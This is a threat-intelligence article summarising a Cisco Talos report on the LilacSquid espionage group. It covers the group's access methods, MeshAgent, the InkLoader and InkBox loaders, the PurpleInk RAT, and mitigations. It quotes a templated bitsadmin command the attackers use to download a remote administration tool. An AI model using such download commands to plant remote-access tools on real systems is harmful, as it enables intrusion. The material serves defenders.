LilacSquid Threat Actor Targets Multiple Sectors Worldwide with PurpleInk Malware


A new report from Cisco Talos exposed the activities of a threat actor known as LilacSquid or UAT-4820. The threat actor exploits vulnerable web applications or uses compromised Remote Desktop Protection credentials to successfully compromise systems by infecting them with custom PurpleInk malware. So far, organizations across various sectors in the US, Europe and Asia have been affected by data theft, although more sectors may have been affected but not yet identified.

Who is LilacSquid?

LilacSquid is a cyber espionage threat actor that has been active since at least 2021. It is also known as UAT-4820.

Some of the industries LilacSquid has targeted so far include:

  • IT organizations that create software for the industrial and research sectors in the US.
  • Organizations in the energy sector in Europe.
  • Pharmaceutical sector organizations in Asia.

Multiple tactics, techniques and procedures used by the threat actor are similar to those of North Korea's advanced persistent threat groups, namely Andariel and its parent parent structure, Lazarus. Among those TTPs, the use of MeshAgent software to maintain access after the initial commitment, as well as the extensive use of proxy and tunneling tools, makes it possible for LilacSquid to link to Lazarus and share tools, infrastructure or other resources.

What are LilacSquid's initial access methods to targets?

First Method: Exploitation of Vulnerable Web Applications

The first method used by LilacSquid to compromise its targets is to successfully exploit vulnerable web applications.

Once the exploitation is complete, the threat actor deploys scripts to configure working folders for the malware, then downloads and runs MeshAgent, an open source remote administration tool. The download is usually done through the legitimate bitsadmin tool of the Microsoft Windows operating system:

bitsadmin /transfer -job_name- /download /normal priority -remote_URL- -local_path_for_MeshAgent- -local_path_for_MeshAgent- connect

MeshAgent uses a text configuration file known as an MSH file, which contains a victim identifier and the Command and Control address.

The tool allows its operator to list all of its target devices, view and control the desktop, manage files on the controlled system, or collect software and hardware information from the device.

Once installed and running, MeshAgent is used to activate other tools such as Secure Socket Funneling, an open source tool for communications proxying and tunneling, and the InkLoader/PurpleInk malware implants.

LilacSquid – Initial access. Image: Cisco Talos

Second method: Using compromised RDP credentials

A second method used by LilacSquid to access targets is to use compromised RDP credentials. When this method is used, LilacSquid chooses to deploy MeshAgent and continue the attack or introduce InkLoader, a simple but effective malware loader.

InkLoader runs another payload: PurpleInk. The loader has only been observed running PurpleInk, but could be used to deploy other malware implants.

LilacSquid - Initial access.
LilacSquid – Initial access. Image: Cisco Talos

Another loader used by LilacSquid is InkBox, which reads and decrypts content from an encoded file path on the drive. The decrypted content is executed by invoking its entry point within the InkBox process running on the computer. This decrypted content is PurpleInk malware.

PurpleInk activation variant.
PurpleInk activation variant. Image: Cisco Talos

What is PurpleInk malware?

The main implant used by the LilacSquid threat actor, PurpleInk, is based on QuasarRAT, a remote access tool available online since at least 2014. PurpleInk was developed from the QuasarRAT base in 2021 and continues to update it. It is heavily obfuscated, in an attempt to make it difficult to detect.

The malware uses a base64-encoded configuration file that contains the IP address and port number for the C2 server.

PurpleInk may collect basic information, such as drive information (e.g., volume labels, root directory names, drive type and format), running process information, or system information (e.g., drive size). memory, username, computer name, IP addresses, computer uptime). ). The malware can also enumerate folders, file names and sizes and replace or add content to files. And PurpleInk is capable of launching a remote shell and sending/receiving data from a specific remote address, usually a proxy server.

How to mitigate this LilacSquid cybersecurity risk

To protect your organization against initial compromise operations executed by LilacSquid, you need to:

  • Keep all Internet-connected web applications updated and patched. Additionally, all hardware, operating systems, and software must be updated and patched to avoid being compromised by other common vulnerabilities.
  • Apply strict policies to employee RDP connections and implement multi-factor authentication where possible to prevent an attacker from being able to log into the corporate network via RDP.
  • Look for MeshAgent configuration files on systems, especially if the tool is not used internally.
  • Carefully consider any use of the bitsadmin tool to download or execute code.
  • Monitor network communications for connections on exotic ports or communications going directly to external IP addresses instead of domains.
  • Deploy endpoint detection solutions (endpoint detection and response or extended detection and response) to detect suspicious activity.
  • Raise employee awareness about cyber threats, particularly how to detect and report phishing attempts.

Divulgation: I work for Trend Micro, but the opinions expressed in this article are my own.

scroll to top